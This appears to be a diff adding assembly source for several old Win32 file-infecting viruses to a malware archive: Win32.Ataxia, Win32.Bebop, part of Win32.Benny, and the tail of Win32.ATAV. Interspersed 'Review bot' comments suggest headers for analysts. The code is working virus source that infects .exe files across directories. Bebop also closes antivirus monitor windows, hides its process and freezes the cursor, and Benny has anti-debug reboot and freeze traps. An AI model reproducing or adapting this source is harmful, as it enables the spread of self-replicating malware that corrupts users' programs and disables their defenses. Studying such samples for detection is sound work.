FT_dwHighDateTime DD ?
filetime ENDS
win32_find_data STRUC
FileAttributes DD ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh DD ?
FileSizeLow DD ?
Reserved0 DD ?
Reserved1 DD ?
FileName DB max_path DUP (?)
AlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
win32_find_data ENDS
search win32_find_data ?
SystemTime SYSTEMTIME <>
windir db 128h dup(0)
sysdir db 128h dup(0)
crtdir db 128h dup(0)
Virtual_End:
First_Gen:
pushad
call Next_Gen
Next_Gen:
pop ebp
sub ebp,offset Next_Gen
mov ecx,SizeCrypt
lea esi,[ebp + Crypto]
decri:
xor dword ptr [esi],0FFh
inc esi
loop decri
push 0
push offset TextF
push offset TextF1
push 0
call MessageBoxA
popad
Jmp Start
TextF db 'Win32.ATAV by Radix16[MIONS]',0
TextF1 db 'First generation sample',0
End First_Gen
+341
@@ -0,0 +1,341 @@
;Win32.Ataxia By Evul
.386p
.model flat
.code ;setting para el Tasm
;=============================
extrn LocalFree:proc;
extrn LocalAlloc:proc;
extrn GetModuleHandleA:proc;
extrn GetModuleFileNameA:proc;
extrn ExitProcess:proc;
extrn WinExec:proc;
extrn GetCommandLineA:proc;
extrn _lopen:proc;
extrn _lcreat:proc;
extrn _lread:proc;
extrn _lwrite:proc;
extrn FindFirstFileA:proc;
extrn FindNextFileA:proc;
extrn DeleteFileA:proc;
extrn MoveFileA:proc;
extrn CloseHandle:proc;
;extrn CreateFileA:proc;
extrn WriteFile:proc;
extrn GetSystemDirectoryA:proc;
extrn GetWindowsDirectoryA:proc;
extrn GetCurrentDirectoryA:proc;
extrn SetCurrentDirectoryA:proc;
extrn lstrcat:proc;
;============================= ;funciones del api que vayamos a usar
include windows.inc
;=============================
virussize equ 8192 ;constante que contiene el tamaño del virus
;=============================
begin:
mov ebx, 0ffffffh
push ebx ;cantidad de memoria a reservar (0ffffffh)
push LMEM_ZEROINIT ;flag (inicializar a cero)
call LocalAlloc ;funcion para separa una cantidad de memoria especficada
mov dword ptr [heap], eax ;puntero a la memoria
cmp eax, 0 ;si es 0 hubo un error
je done_this ;asi que nos largamos de aqui
fixhost:
push offset handle1
call GetModuleHandleA ;obtiene el handle del archivo ejecutado
push 50
push offset handle2
push eax
call GetModuleFileNameA ;guarda en handle2 el nombre de este archivo
push offset filedta
push offset handle2
call FindFirstFileA ;Busca este archivo , para obtener datos sobre el
lea esi, [cFileName] ;pone en esi el nombre del file encontrado
lea edi, [newfilename] ;apunta edi al buffer del nuevo nombre de file
stowit_:
lodsb
cmp al, '.'
je addext_
stosb
jmp stowit_ ;busca el punto dentro del nombre del file
addext_:
stosb
lea esi, [newext]
movsw
movsw ;le agrega la extension .vxe
push 0
push offset cFileName
call _lopen ;abre el archivo .vxe
mov dword ptr [open_handle],eax ;guarda el handle del archivo
push dword ptr [nFileSizeLow]
push dword ptr [heap]
push eax
call _lread ;mueve a la memoria el todo el ejecutable
push dword ptr [open_handle]
call CloseHandle ;cierra el archivo
push 0
push offset newfilename
call _lcreate ;crea de nuevo el .exe
mov ebx, dword ptr [nFileSizeLow]
sub ebx, virussize ;le resta al tamaño del .exe el del virus para obtener el tamaño
push ebx ;del .exe original
mov ebx, dword ptr [heap]
add ebx, virussize ;mueve el puntero al principio del .exe original
push ebx
push dword ptr [open_handle]
call _lwrite ;y luego lo escribe con el nombre del exe
push dword ptr [open_handle]
call CloseHandle ;cierra el .exe
push 0
push offset evulzfile
call _lcreat ;crea un archivo con nombre evul.tmo
mov dword ptr [open_handle],eax
push virussize
push dword ptr [heap]
push eax
call _lwrite ; y escribe en este el virus original
push dword ptr [open_handle]
call CloseHandle ; y cierra evul.tmp
push 2
push offset evulzfile
call _lopen ;vuelve y abre evul.tmp (?????)
mov dword ptr [open_handle],eax
push virussize
push dword ptr [heap]
push eax
call _lread ;lee el virus DE NUEVO a memoria (?????)
push dword ptr [open_handle]
call CloseHandle ;vuelve y cierra el archivo
execit:
jmp dirloop ;salta a la busque de archivos
FEXY:
mov byte ptr [infected],0 ;pone # de infected a 0
push offset filedta
push offset maska
call FindFirstFileA ;busca archivos .exe en el path actual
mov dword ptr [handle_],eax ;guarda el handle de busqueda
cmp eax, 0
je done_this ;si hay un error nos largamos de aqui
check:
mov bx, word ptr[cFileName]
cmp bx, 'XE' ; Explorer ?
je nextfile
cmp bx, 'UR' ; RUNDll ?
je nextfile
cmp bx, 'ur' ; rundll ?
je nextfile
cmp bx, 'ME' ; Emm386 ??
je nextfile
cmp bx, 'va' ; Antivirus ?
je nextfile
cmp bx, 'sv' ; Antivirus ?
je nextfile
cmp dword ptr [nFileSizeLow],(0ffffffh-virussize); Muy Grande ??
jg nextfile ;si cualquiera de las anteriores se cumple no lo infecta
push 2
push offset cFileName
call _lopen ;abrimos la victima
mov dword ptr [open_handle],eax
mov ebx, dword ptr [nFileSizeLow]
mov dword ptr [hostsize], ebx ;guardamos en ebx el tamaño del exe a infectar
push ebx
mov ebx, dword ptr [heap]
add ebx, virussize ;le sumamos al tamaño del exe el tamaño del virus
push ebx
push eax
call _lread ;leemos los datos del exe en la memoria luego del cuerpo del virus
push dword ptr [open_handle]
call CloseHandle ;lo cerramos
mov ebx, dword ptr [heap]
add ebx, (virussize+12h)
cmp byte ptr [ebx], 'X'
je bail
add ebx, 6
cmp byte ptr [ebx], '@'
jne bail ;miramos en 12h y en 18h esta la marca de infeccion
push 2
push offset cFileName
call _lopen ;Volvemos a abrir el archivo (???)
mov dword ptr [open_handle],eax
mov ebx, dword ptr [nFileSizeLow]
add ebx, virussize ;obtenemos el tamaño del exe mas el del virus
push ebx
push dword ptr [heap]
push eax
call _lwrite ;escribimos el exe nuevo y el virus
inc byte ptr [infected]
bail:
push dword ptr [open_handle]
call CloseHandle ; lo cerramos
cmp byte ptr [infected],5
je done_this ;si ya infectamos 5 nos largamos
nextfile:
push offset filedta
mov eax, dword ptr [handle_]
push eax
call FindNextFileA ;continuamos con la busqueda de EXEs
cmp eax, 0
je done_this ;si no hay mnas nos largamos
jmp check
done_this:
ret
dirloop:
call FEXY ;se devuelve
push offset curdir
push 260
call GetCurrentDirectoryA
uploop:
push offset updir
call SetCurrentDirectoryA
cmp eax, 1
jne trywindows
call FEXY ;nos movemos al directorio de arriba (\..) y buscamos otros 5 EXEs
trywindows:
push 260
push offset windir
call GetWindowsDirectoryA
push offset windir
call SetCurrentDirectoryA
call FEXY ;nos movemos al directorio de windows y buscamos otros 5 EXEs
push offset curdir
call SetCurrentDirectoryA ;restauramos el antiguo dir.
mov eax, dword ptr [heap]
call LocalFree ;liberamos la memoria reservada
call GetCommandLineA
mov esi, eax ;obtenemos la linea de comandos del ejecutable actual
loopdot:
mov edi, esi
lodsb
cmp al, '.'
jne loopdot ;busacmso el punto
stosb
lea esi, [fixcmd]
movsw
movsw ;le agrgamos la extension VXE
call GetCommandLineA
push 00000001
inc eax
push eax
call WinExec ; y lo ejecutamos fianlmente
deleteit:
push offset newfilename
call DeleteFileA ;borramos el archivo .exe temporal
cmp eax, 0
je deleteit ;si hay un error lo volvemos a borrar
push offset evulzfile
call DeleteFileA ; borramos el evul.tmp
push 0
call ExitProcess ; y por fin terminamos
;=============================
.data
windir db 260 dup(0)
curdir db 260 dup(0)
maska db '*.exe',0
newext db 'VXE',0
fixcmd db 'VXE '
evulzfile db 'Evul.tmp',0
handle_ dd 0
open_handle dd 0
heap dd 0
hostsize dd 0
commandline dd 0
updir db '..',0
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 50 dup(0)
cAltFileName db 50 dup(0)
handle1 db 50 dup(0)
handle2 db 50 dup(0)
written dd 0
infected db 0
newfilename db 50 dup(0)
end begin
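Review bot: There is no header comment summarizing the on-disk artifacts this sample leaves, which is the first thing an analyst working from this archive needs, and the only in-code comments are Spanish one-liners. From the code, `fixhost` rebuilds the host as `<name>.VXE` (the `stowit_`/`addext_` loop appends `newext`), writes the first `virussize` bytes of its own image to `evulzfile` (`Evul.tmp`), and `check` decides whether to touch a file from the bytes at offsets 12h and 18h of the read-in image (compared with `'X'` and `'@'`), stopping after `infected` reaches 5 per directory. A header such as `; artifacts: <host>.VXE and Evul.tmp in the current dir; targets *.exe in cwd, each parent dir and %windir%, max 5 per dir; skips names beginning XE/UR/ur/ME/va/sv` would let detection and cleanup be keyed on those without reading the listing. Note also that `deleteit` loops on `DeleteFileA` until it succeeds, so a `.VXE` that is still running leaves the process spinning rather than exiting, an observable behaviour worth recording for sandbox analysis.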
+634
@@ -0,0 +1,634 @@
COMMENT#
____________________________________________________________________________________________
Win32.Bebop - Virus [Companion]
coded by -DiA- (c)03
GermanY
____________________________________________________________________________________________
Intro:
Yeah! My new creature. This is a Companion Virus (what else?). Ok, I hope you enjoy
this, and let the CODE speak...
Disclaimer:
I am NOT responsible for any damage that you do! You can need the code however you want..
My motherlanguage is not English, I hope you understand what I mean.
Feel FREE to write any Comments to
DiA_hates_machine@gmx.de
Infection:
-infect current directory
-travel directory's downwards and infect them all
-go to the Windows folder and infect them
-go to the Personal folder and infect them
-infect twenty files per run
-don't infect again
Features:
-Anti-Debug
-Anti-AV-Monitors
-Anti-Bait
Payload:
-on the first day every month
-first show a little message
-after that the cursor is very slow
-workz with a thread
Greetz:
Industry - m8! See on rRLF 3
Monochrom - thanx for TASM32, you see... ;)
Weed - thanx for all, my little ganja
MyCrew - Next month, HARDCORE at Skatehall! Rock on.
?????? - and to the fucker that send me two or three mails: "Be a Internet Million..
" FUCK YOU, YOU STUPID MOTHERFUCKER! Don't send me mail's, Son of a Bitch!
First Generation:
;-----cut-----Bebop666.asm---------------------------------------------------------------
.386
.model flat
jumps
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
.data
oTitle db 'Win32.Bebop - Virus - First Generation',0
oMsg db 'Yo dood, this is only the first generation',10,13
db 'from the Bebop - Virus. Have fun, now you',10,13
db 'are infected...',10,13,10,13
db ' coded by DiA 03 GermanY',0
.code
FirstGen:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
push 0
call ExitProcess
end FirstGen
;-----cut--------------------------------------------------------------------------------
Compile:
First Gen->
TASM32 /z /ml /m3 Bebop666,,;
TLINK32 -Tpe -c -aa Bebop666,Bebop666,, import32.lib
rename Bebop666.EXE Bebop.SYS
Virus ->
TASM32 /z /ml /m3 Bebop,,;
TLINK32 -Tpe -c -aa Bebop,Bebop,, import32.lib
[Bebop.EXE and Bebop.SYS must be in one directory]
Ok, that's it! I write many comment's in the code...
...HAVE FUN and read my tut's! :)
____________________________________________________________________________________________
____________________________________________________________________________________________
#
;-------------------------------------------------------------------------------------------
;-----HEAD----------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.386
.model flat
jumps
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Needed API's--------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
extrn IsDebuggerPresent :PROC
extrn GetCurrentProcessId :PROC
extrn RegisterServiceProcess :PROC
extrn GetCommandLineA :PROC
extrn lstrcpyA :PROC
extrn CreateProcessA :PROC
extrn CopyFileA :PROC
extrn FindFirstFileA :PROC
extrn FindNextFileA :PROC
extrn SetCurrentDirectoryA :PROC
extrn RegOpenKeyExA :PROC
extrn RegQueryValueExA :PROC
extrn RegCloseKey :PROC
extrn FindWindowA :PROC
extrn PostMessageA :PROC
extrn GetWindowsDirectoryA :PROC
extrn GetSystemTime :PROC
extrn CreateThread :PROC
extrn CloseHandle :PROC
extrn GetCursorPos :PROC
extrn SetCursorPos :PROC
extrn Sleep :PROC
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Nedded DATA's-------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.data?
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
SYSTEMTIME:
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMilliseconds WORD ?
POINT:
x DWORD ?
y DWORD ?
VirusFile db 260d dup (?)
HostFile db 260d dup (?)
TargetFile db 260d dup (?)
ProcessInfo dd 4 dup (?)
StartupInfo dd 4 dup (?)
PersonalFolder db 260d dup (?)
WindowsFolder db 260d dup (?)
.data
AVP db 'AVP Monitor',0
McAfee db 'McAfee VShield',0
Solomon db 'SCAN32',0
FProt db 'FP-WIN',0
Norton db 'NAVAPW32',0
FindHandle dd 0
RegHandle dd 0
lpType dd 0
ThreadID dd 0
FileMask db '*.EXE',0
FileCounter db 20
Size dd 260d
ShellFolders db '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Personal db 'Personal',0
oTitle db 'Win32.Bebop - Virus',0
oMsg db 'Yeah! Bebop get''s you. Don''t be angry, this nice',10,13
db 'Virus don''t have any DESTRUCTIVE CODE!',10,13
db 'Or for stupid people: Wait a while, next day the',10,13
db 'Bebop-Virus go away...',10,13,10,13
db ' Win32.Bebop coded by DiA (c)2003 [GermanY]',0
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Win32.Bebop starts--------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.code
Bebop:
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Fuck some AV-Monitors-----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call AntiDebugger ;check for debugger
mov esi,offset AVP
call KillMonitor ;kill the window
mov esi,offset McAfee
call KillMonitor ;kill the window
mov esi,offset Solomon
call KillMonitor ;kill the window
mov esi,offset FProt
call KillMonitor ;kill the window
mov esi,offset Norton
call KillMonitor ;kill the window
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Hide the Bebop Process----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCurrentProcessId ;get id to hide the Bebop
push 1 ;register as "SystemService"
push eax ;ProcessID
call RegisterServiceProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Restore Hostname & Run Host-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCommandLineA ;looks like "C:\MyC00lPr0gZ\veryCool\Fucking.EXE"
inc eax ;fuck the "
push eax
push offset VirusFile ;copy it to VirusFile to work with it
call lstrcpyA ;copy the string
mov esi,offset VirusFile
call GetPoint ;get the point (...ddd.EXE") to clear "
mov dword ptr [esi+4],00000000h ;fuck it, now we have the path of the VirusFile
push offset VirusFile ;copy path of VirusFile to
push offset HostFile ;HostFile, to work with it
call lstrcpyA
mov esi,offset HostFile
call GetPoint ;get point to rename it
mov dword ptr [esi],5359532Eh ; SYS. ,now we have the path of the HostFile
call AntiDebugger ;check for debugger
xor eax,eax ;null
push offset ProcessInfo
push offset StartupInfo
push eax
push eax
push 10h ;create a new process
push eax
push eax
push eax
push offset HostFile ;path for HostFile
push offset HostFile ;run this file
call CreateProcessA
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Travel Directorys & Infect them-------------------------------------------------------
;-------------------------------------------------------------------------------------------
mov esi,offset HostFile ;don't need anymore, use it to get the directory
call GetPoint ;first get the point
mov ebx,esi ;first get the path of current dir
call CDdotdot ;-"-
call InfectFiles ;and infect files in this directory
InfectCDdotdot:
call CDdotdot ;cd..
test ebx,ebx ;error code?
jz InfectNext ;if yes search other dir's
call InfectFiles ;infect it!
jmp InfectCDdotdot ;cd.. , infect, cd.. , ...
InfectNext: ;other directorys
call AntiDebugger ;often!
push 260d
push offset WindowsFolder ;save there
call GetWindowsDirectoryA ;easyer to get it with api, not registry
mov esi,offset WindowsFolder ;set directory
call SetDirectory
call InfectFiles ;and infect them
call GetPersonalDir ;infect them too
mov esi,offset PersonalFolder ;to set the directory
call SetDirectory ;set it
call InfectFiles ;infect them
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Payload, if Day 1. of Month-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
push offset SYSTEMTIME ;structure
call GetSystemTime ;get time
cmp word ptr [wDay],1 ;first day of mounth?
jne FuckingDebugger ;if not exit
push offset ThreadID ;the ID
push 0
push 0
push offset StopCursor ;the pklace where are the thread
push 0
push 0
call CreateThread
push eax ;close da handle
call CloseHandle ;close it
GetCurrentPos: ;get current cursor pos
push offset POINT ;structure
call GetCursorPos
jmp GetCurrentPos ;again and again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Exit & stay (sic)---------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
FuckingDebugger:
push 0
call ExitProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Infect Files Procedure----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
InfectFiles: ;procedure
call AntiDebugger ;fuck you!
push offset WIN32_FIND_DATA ;Win32 find data is kewl
push offset FileMask ;'*.EXE',0
call FindFirstFileA ;find first
mov dword ptr [FindHandle],eax ;save da handle
FindNext:
test eax,eax ;error?
jz FindMore ;check other directory's
push offset WFD_szFileName ;copy filename of founded file
push offset TargetFile ;to rename and copy it
call lstrcpyA
xor eax,eax ;null
mov esi,offset TargetFile ;is it bait?
mov edi,esi
mov ecx,48d ;0
CheckBait: ;check for bait
lodsb ;load one byte
CheckNum: ;check for a digit
cmp eax,46d ; point?
je Bait ;don't infect, it's a fucking bait
cmp eax,ecx ;a number?
je ScanNext ;scan next digit
cmp eax,57d ;over 9
ja NoBait ;it's no bait, ...infect them
inc ecx ;check next number (0,1,2,3,4,...)
jmp CheckNum ;again
ScanNext: ;scan next place
stosb ;save the byte (edi,esi +1)
mov ecx,48d ;restore ecx
jmp CheckBait ;check ma
NoBait: ;go on with infection
mov esi,offset TargetFile ;find point to rename
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
push 1 ;don't copy if file allready exist
push offset TargetFile ;copy to this path and filename (TargetFile.SYS)
push offset WFD_szFileName ;the real name to the fake name
call CopyFileA
test eax,eax ;error -> file already exist
jz FindNextPhile ;jmp
push 0 ;copy always
push offset WFD_szFileName ;copy the VirusFile over the real File
push offset VirusFile ;now HostName: xxx.SYS VirusName: xxx.EXE
call CopyFileA
dec byte ptr [FileCounter] ;counter -1
cmp byte ptr [FileCounter],0 ;zero?
jz FuckingDebugger ;if yes exist
FindNextPhile:
call AntiDebugger ;antiman
Bait: ;search next file, last was a bait
push offset WIN32_FIND_DATA ;get info from Win32FindData
push dword ptr [FindHandle] ;handle of file we search...
call FindNextFileA
jmp FindNext ;go up!
FindMore:
ret ;return and search in other directory's
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Anti Debug Procedure------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
AntiDebugger:
call IsDebuggerPresent ;check for Debugger
test eax,eax ;if yes jmp to...
jnz FuckingDebugger ;FuckingDebugger:
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Get Point Procedure-------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
GetPoint: ;procedure
cmp byte ptr [esi],'.' ;check for point
jz FoundPoint ;if point, return
inc esi ;if not check next place
jmp GetPoint
FoundPoint:
call AntiDebugger
ret ;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----CD.. Procedure------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
CDdotdot: ;procedure
GetSlash: ;'\'
cmp byte ptr [ebx],'\'
jz ClearAfter ;if yes, clear al after the \
cmp byte ptr [ebx],':' ; are we at C:\
jz SetError ;set a error code and exit procedure
dec ebx ;esi -1
jmp GetSlash ;search again
ClearAfter: ;clear all after the slash
inc ebx ;but don't clear \ (needed to travel!)
mov dword ptr [ebx],00000000h ;fuck it all, fuck this world, fuck everything th...
sub ebx,2 ;go in front of \
mov esi,offset HostFile ;now a path for the directory cd..
SetDirectory: ;procedure
push esi
call SetCurrentDirectoryA ;set the dir
ret ;return
SetError: ;we are at C:, can't cd.. anymore
xor ebx,ebx ;zero
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Read Personal Directory from Registry Procedure---------------------------------------
;-------------------------------------------------------------------------------------------
GetPersonalDir: ;procedure
push offset RegHandle ;save there the handle
push 001F0000h ;read and write
push 0
push offset ShellFolders ;subkey
push 80000003h ;HKEY_...
call RegOpenKeyExA ;open the subkey
test eax,eax ;error?
jnz RegError ;set error code and return
push offset Size ;260d
push offset PersonalFolder ;save the value there
push offset lpType ;fuck off
push 0
push offset Personal ;value name
push dword ptr [RegHandle] ;handle from subkey
call RegQueryValueExA ;read!
RegError: ;error!
call AntiDebugger
push dword ptr [RegHandle] ;close reg
call RegCloseKey
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Anti AV-Monitor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
KillMonitor:
call AntiDebugger
push esi ;offset to monitor name
push 0
call FindWindowA ;find it
test eax,eax ;error?
jz FuckNextMonitor ;return
push 0
push 0
push 12h ;WM_QUIT = kill
push eax ;handle of window
call PostMessageA ;shot 'em up
FuckNextMonitor:
ret ;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Stop the Cursor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
StopCursor:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
call AntiDebugger
SleepStop:
push 2000d ;sleep 2sek
call Sleep
xor edx,edx
StopIt:
cmp edx,4000d
je SleepStop
push dword ptr [y] ;y coor
push dword ptr [x] ;x coor
call SetCursorPos ;stop it
inc edx
jmp StopIt ;stop again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Win32.Bebop ends----------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
end Bebop
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;------------------------------------------------------------------------Germany2003--------
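Review bot: The registry access in `GetPersonalDir` is under-commented where it matters: `push 80000003h ;HKEY_...` names no hive, and `push 001F0000h ;read and write` is not a read/write mask. 80000003h is HKEY_USERS (consistent with the `.DEFAULT\Software\...\Shell Folders` subkey) and 001F0000h is STANDARD_RIGHTS_ALL, so I would write `push 001F0000h ;samDesired = STANDARD_RIGHTS_ALL` and `push 80000003h ;HKEY_USERS`. Likewise `push 10h ;create a new process` in the `CreateProcessA` call fills the dwCreationFlags slot and 10h is CREATE_NEW_CONSOLE, which a comment should say for anyone cross-referencing the call. For the same audience the header's `Features` list would benefit from naming the observable artifacts already visible in the code: a `<name>.SYS` copy of each host beside a `<name>.EXE` copy of the virus, the `RegisterServiceProcess` call used to hide the process from the task list, and the `WM_QUIT` posted to the five listed AV window titles.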
+994
@@ -0,0 +1,994 @@
;-------------------------------------;
; Win32.Benny (c) 1999 by Benny ;
;-------------------------------------;
;
;
;
;Author's description
;---------------------
;
;Welcome to my second Win32 virus! Don't expect any new things, I only
;present u my last lame virus. Here is it...
;
;Features:
;----------
; - Win32 infector
; - appends to the last section (usualy .reloc)
; - "already infected" mark as my spec. 64bit checksum.
; - no use of absolute addresses, gets GetModuleHandleA API from IAT
; - compressed (API strings only)
; - using memory mapped files for smarter handling of 'em
; - direct action
; - nonencrypted
; - armoured (using SEH), TD32 fails
;
;Targets:
;---------
; - *.EXE
; - *.SRC
;
;How to build:
;--------------
; - tasm32 -ml -q -m4 benny.asm
; tlink32 -Tpe -c -x -aa -r benny,,, import32
; pewrsec benny.exe
;
;
;
;AVP's description
;------------------
;
;Benny's notes r in "[* *]".
;
;
;This is a direct action (nonmemory resident) parasitic [* compressed *] Win32
;virus. It searches for PE EXE files in the Windows, Windows system and current
;directories [* shit! It DOESN'T infect Windows/System directories! *], then
;writes itself to the end of the file. The virus has bugs and in many cases
;corrupts files while infecting them [* Sorry, this is my last lame virus *].
;The virus checks file names and does not infect the files: RUNDLL32.EXE,
;TD32.EXE, TLINK32.EXE, TASM32.EXE [* and NTVDM.EXE *]. While infecting the
;virus increases the size of last file section, writes itself to there and
;modifies necessary PE header fields including program startup address.
;
;The virus contains the "copyright" string:
;
; Win32.Benny (c) 1999 by Benny
;
;
;
;And here is that promised babe:
.386p ;386 instructions
.model flat ;32bit offset, no segments
include PE.inc ;include some useful files
include MZ.inc
include Useful.inc
include Win32api.inc
nFile = 1 ;constants for decompress stage
nGet = 2
nSet = 3
nModule = 4
nHandle = 5
nCreate = 6
nFind = 7
nFirst = 8
nNext = 9
nClose = 10
nViewOf = 11
nDirectoryA = 12
nEXE = 13
extrn GetModuleHandleA:PROC ;APIs needed by first generation
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
db ? ;shut up, tlink32 !
ends
.code
Start_Virus:
pushad ;save all regs
call gdelta
ve_strings: ;compressed APIs
veszKernel32 db 'KERNEL32', 0
veszGetModuleHandleA db nGet, nModule, nHandle, 'A', 0
veszGetVersion db nGet, 'Version', 0
veszIsDebuggerPresent db 'IsDebuggerPresent', 0
veszCreateFileA db nCreate, nFile, 'A', 0
veszFindFirstFileA db nFind, nFirst, nFile, 'A', 0
veszFindNextFileA db nFind, nNext, nFile, 'A', 0
veszFindClose db nFind, nClose, 0
veszSetFileAttributesA db nSet, nFile, 'AttributesA', 0
veszCloseHandle db nClose, nHandle, 0
veszCreateFileMappingA db nCreate, nFile, 'MappingA', 0
veszMapViewOfFile db 'Map', nViewOf, nFile, 0
veszUnmapViewOfFile db 'Unmap', nViewOf, nFile, 0
veszSetFilePointer db nSet, nFile, 'Pointer', 0
veszSetEndOfFile db nSet, 'EndOf', nFile, 0
veszSetFileTime db nSet, nFile, 'Time', 0
veszGetWindowsDirectoryA db nGet, 'Windows', nDirectoryA, 0
veszGetSystemDirectoryA db nGet, 'System', nDirectoryA, 0
veszGetCurrentDirectoryA db nGet, 'Current', nDirectoryA, 0, 0
veszExe db '*', nEXE, 0
veszScr db '*.SCR', 0
veszNames db 'NTVDM', nEXE, 0 ;files, which we wont
db 'RUNDLL32', nEXE, 0 ;infect
db 'TD32', nEXE, 0
db 'TLINK32', nEXE, 0
db 'TASM32', nEXE, 0
vszNumberOfNamez = 5
end_ve_stringz db 0ffh ;end of compressed
;strings
string_subs: ;string substitutes
db 'File', 0
db 'Get', 0
db 'Set', 0
db 'Module', 0
db 'Handle', 0
db 'Create', 0
db 'Find', 0
db 'First', 0
db 'Next', 0
db 'Close', 0
db 'ViewOf', 0
db 'DirectoryA', 0
db '.EXE', 0
num = 14 ;number of 'em
gdelta: ;get delta offset
mov esi, [esp]
mov ebp, esi
sub ebp, offset ve_strings
lea edi, [ebp + v_strings]
next_ch:lodsb ;decompressing stage
test al, al
je copy_b
cmp al, 0ffh
je end_unpacking
cmp al, num+1
jb packed
copy_b: stosb
jmp next_ch
packed: push esi
lea esi, [ebp + string_subs]
mov cl, 1
mov dl, al
lodsb
packed2:test al, al
je _inc_
packed3:cmp cl, dl
jne un_pck
p_cpy: stosb
lodsb
test al, al
jne p_cpy
pop esi
jmp next_ch
un_pck: lodsb
test al, al
jne packed3
_inc_: inc ecx
jmp un_pck
seh_fn: @SEH_RemoveFrame ;remove exception frame
popad ;heal stack
call [ebp + MyGetVersion] ;get version of windoze
cmp eax, 80000000h ;WinNT ?
jb NT_debug_trap
cmp ax, 0a04h ;Win95 ?
jb seh_rs
call IsDebugger ;Win98, check, if debugger active
jecxz seh_rs ;no, continue
mov eax, 909119cdh ;yeah, reboot system
jmp $ - 4
NT_debug_trap:
call IsDebugger ;WinNT, check, if debugger active
jecxz seh_rs ;no, continue
xor esp, esp ;yeah, freeze app
IsDebugger:
call [ebp + MyIsDebuggerPresent] ;call checkin API
xchg eax, ecx
ret
quit: pop eax
mov eax, [ebp + OrigEPoint] ;get original entrypoint rva
sub eax, -400000h ;make it raw pointer
mov [esp.Pushad_eax], eax
popad
